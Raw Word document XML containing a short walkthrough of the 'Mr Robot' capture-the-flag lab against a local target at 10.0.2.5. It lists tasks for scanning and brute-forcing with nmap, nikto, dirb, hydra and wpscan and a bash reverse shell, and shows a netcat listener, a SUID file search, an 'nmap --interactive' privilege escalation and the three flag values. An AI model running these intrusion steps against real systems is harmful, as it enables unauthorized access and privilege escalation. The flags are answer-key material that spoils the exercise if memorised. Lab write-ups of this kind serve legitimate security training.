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A90C" w14:textId="77777777" w:rsidR="00825A2C" w:rsidRPr="00825A2C" w:rsidRDefault="00825A2C" w:rsidP="00825A2C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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00825A2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Mr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00825A2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Robot CTF (Capture </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00825A2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The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00825A2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Flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A939C05" w14:textId="09518624" w:rsidR="00D146E5" w:rsidRPr="00EC741F" w:rsidRDefault="00825A2C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EC741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Task 1: find the proper format of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC741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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC741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command and run it</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC741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42E6CF46" w14:textId="3254B8F6" w:rsidR="00825A2C" w:rsidRDefault="00825A2C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EB34F2F" wp14:editId="3812C049">
            <wp:extent cx="2771775" cy="222097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543" cy="22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889C" w14:textId="0C5495C9" w:rsidR="00825A2C" w:rsidRPr="00EC741F" w:rsidRDefault="00825A2C">
      <w:p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EC741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Task 2: check the website hosted on the target. You will need to find a way to access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2402FAD7" w14:textId="4B5DD562" w:rsidR="00E34523" w:rsidRDefault="00D26D0F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="57606A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noProof/>
          <w:color w:val="57606A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69CFF24E" wp14:editId="1FECC79B">
            <wp:extent cx="3981450" cy="25155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275" cy="252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04BB" w14:textId="15539BE2" w:rsidR="00825A2C" w:rsidRPr="00EC741F" w:rsidRDefault="00825A2C">
      <w:p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EC741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Task 3: find the proper format of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC741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nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC741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command and run it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438FE081" w14:textId="6D7F0BB4" w:rsidR="00825A2C" w:rsidRPr="00EC741F" w:rsidRDefault="00825A2C">
      <w:pPr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</w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC741F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nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC741F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 xml:space="preserve"> -h http://10.0.2.5/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23254078" w14:textId="26D8F46D" w:rsidR="00825A2C" w:rsidRDefault="00825A2C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E3084FC" wp14:editId="6AC8A0EC">
            <wp:extent cx="3390900" cy="251272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518" cy="25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B829" w14:textId="79213E0E" w:rsidR="000266E4" w:rsidRPr="00EC741F" w:rsidRDefault="000266E4">
      <w:p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EC741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Task 4: find the proper format for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC741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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC741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or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC741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dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC741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command and run it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5691CE" w14:textId="3EC26CCB" w:rsidR="000266E4" w:rsidRDefault="000266E4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19EC2D71" wp14:editId="08DDCDD1">
            <wp:extent cx="4599305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107" cy="220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8D80" w14:textId="50AFF8C9" w:rsidR="00D26D0F" w:rsidRDefault="006B669F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E7DB605" wp14:editId="5FA6A608">
            <wp:extent cx="5943600" cy="192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2491" w14:textId="5459C4F5" w:rsidR="006B669F" w:rsidRDefault="006B669F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="282BDD39" wp14:editId="2A25D0C5">
            <wp:extent cx="594360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D39B" w14:textId="6C33573A" w:rsidR="006B669F" w:rsidRDefault="006B669F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E348BC4" wp14:editId="65311161">
            <wp:extent cx="5943600" cy="143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3952" w14:textId="58BB7B04" w:rsidR="006B669F" w:rsidRPr="00EC741F" w:rsidRDefault="006B669F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>!!! First key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6B297D" w14:textId="20C83E5B" w:rsidR="006B669F" w:rsidRPr="00EC741F" w:rsidRDefault="006B669F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>073403c8a58a1f80d943455fb30724b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE0EF1" w14:textId="687C4574" w:rsidR="00E34523" w:rsidRPr="00EC741F" w:rsidRDefault="00E34523">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00EC741F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Task 5: find the proper format for hydra command and run it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02816A5B" w14:textId="245B5671" w:rsidR="004354AF" w:rsidRPr="00EC741F" w:rsidRDefault="004354AF">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00EC741F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Login = Elliot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A007E0" w14:textId="09EAED31" w:rsidR="00E34523" w:rsidRDefault="004354AF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="57606A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noProof/>
          <w:color w:val="57606A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="149A27A7" wp14:editId="4E6CE0D2">
            <wp:extent cx="5943600" cy="241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84A2" w14:textId="415AE8F4" w:rsidR="00E34523" w:rsidRPr="00EC741F" w:rsidRDefault="00E34523">
      <w:p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EC741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Task 6: find the proper format for hydra or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC741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wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC741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command and run it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A7A48B" w14:textId="45E64D3E" w:rsidR="00E34523" w:rsidRDefault="00F068BC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="57606A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noProof/>
          <w:color w:val="57606A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F2E114D" wp14:editId="47425E92">
            <wp:extent cx="5943600" cy="1781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2F5D" w14:textId="19C34038" w:rsidR="00E34523" w:rsidRPr="00EC741F" w:rsidRDefault="00E34523">
      <w:p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EC741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Task 7: find what should exec function run to reverse shell by executing bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72835C2A" w14:textId="20A54550" w:rsidR="00F068BC" w:rsidRDefault="00C53D34">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="57606A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noProof/>
          <w:color w:val="57606A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05EAEADC" wp14:editId="3A48A825">
            <wp:extent cx="5943600" cy="1990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5C96" w14:textId="085FA32D" w:rsidR="00283800" w:rsidRPr="00283800" w:rsidRDefault="00EC741F" w:rsidP="00EC7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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00283800" w:rsidRPr="00283800">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00283800" w:rsidRPr="00283800">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00283800" w:rsidRPr="00283800">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00283800" w:rsidRPr="00283800">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F60E400" w14:textId="68051D49" w:rsidR="001B7455" w:rsidRPr="00EC741F" w:rsidRDefault="00283800" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="00EC741F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$ ls -l /home/robot/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27416BA3" w14:textId="14D61A9E" w:rsidR="00283800" w:rsidRPr="00EC741F" w:rsidRDefault="00283800" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="00EC741F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$ cat password.raw-md5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C7DEB6" w14:textId="7458D28B" w:rsidR="00EC741F" w:rsidRPr="00EC741F" w:rsidRDefault="00EC741F" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="00EC741F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$ which python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30363654" w14:textId="77777777" w:rsidR="00EC741F" w:rsidRPr="00EC741F" w:rsidRDefault="00EC741F" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="00EC741F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 xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC741F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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2ACF122D" w14:textId="77777777" w:rsidR="00EC741F" w:rsidRPr="00EC741F" w:rsidRDefault="00EC741F" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC741F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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64F92422" w14:textId="77777777" w:rsidR="00EC741F" w:rsidRPr="00EC741F" w:rsidRDefault="00EC741F" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="00EC741F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robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EC19BF" w14:textId="77777777" w:rsidR="00EC741F" w:rsidRPr="00EC741F" w:rsidRDefault="00EC741F" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="00EC741F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$ cat key-2-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A495B8" w14:textId="77777777" w:rsidR="00EC741F" w:rsidRPr="00EC741F" w:rsidRDefault="00EC741F" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="00EC741F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cat key-2-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E922020" w14:textId="35108BD0" w:rsidR="00EC741F" w:rsidRPr="00EC741F" w:rsidRDefault="00EC741F" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="00EC741F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822c73956184f694993bede3eb39f959</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7476CAF2" w14:textId="2935BEB0" w:rsidR="00E34523" w:rsidRPr="00EC741F" w:rsidRDefault="00283800">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>!!! Second key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE141CE" w14:textId="56D0677A" w:rsidR="00283800" w:rsidRPr="00EC741F" w:rsidRDefault="00283800">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>822c73956184f694993bede3eb39f959</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141EA703" w14:textId="76F9E2F2" w:rsidR="00EC741F" w:rsidRDefault="00EC741F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B845B57" w14:textId="3D6F2E15" w:rsidR="00EC741F" w:rsidRPr="00EC741F" w:rsidRDefault="00EC741F" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>$ find / -user root -perm -4000 -print 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E35EB2A" w14:textId="77777777" w:rsidR="00EC741F" w:rsidRPr="00EC741F" w:rsidRDefault="00EC741F" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> --interactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D47AA00" w14:textId="158B7650" w:rsidR="00EC741F" w:rsidRPr="00EC741F" w:rsidRDefault="00EC741F" w:rsidP="00EC741F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> --interactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1564DFFB" w14:textId="51669AA1" w:rsidR="00283800" w:rsidRPr="00EC741F" w:rsidRDefault="00283800">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>!!! third key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6846E7E8" w14:textId="2739DBB3" w:rsidR="00283800" w:rsidRPr="00EC741F" w:rsidRDefault="00283800">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC741F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>04787ddef27c3dee1ee161b21670b4e4</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00283800" w:rsidRPr="00EC7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89"/>
    <w:rsid w:val="000266E4"/>
    <w:rsid w:val="001B7455"/>
    <w:rsid w:val="00283800"/>
    <w:rsid w:val="002C1179"/>
    <w:rsid w:val="004354AF"/>
    <w:rsid w:val="00631AAA"/>
    <w:rsid w:val="006B669F"/>
    <w:rsid w:val="00825A2C"/>
    <w:rsid w:val="00C53D34"/>
    <w:rsid w:val="00D146E5"/>
    <w:rsid w:val="00D26D0F"/>
    <w:rsid w:val="00D56289"/>
    <w:rsid w:val="00E34523"/>
    <w:rsid w:val="00EC741F"/>
    <w:rsid w:val="00F068BC"/>
    <w:rsid w:val="00FB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379D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DF77050C-99BD-409F-85F1-0A51DBA6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5A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A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25A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8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38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2022-06-02T09:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-02T11:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>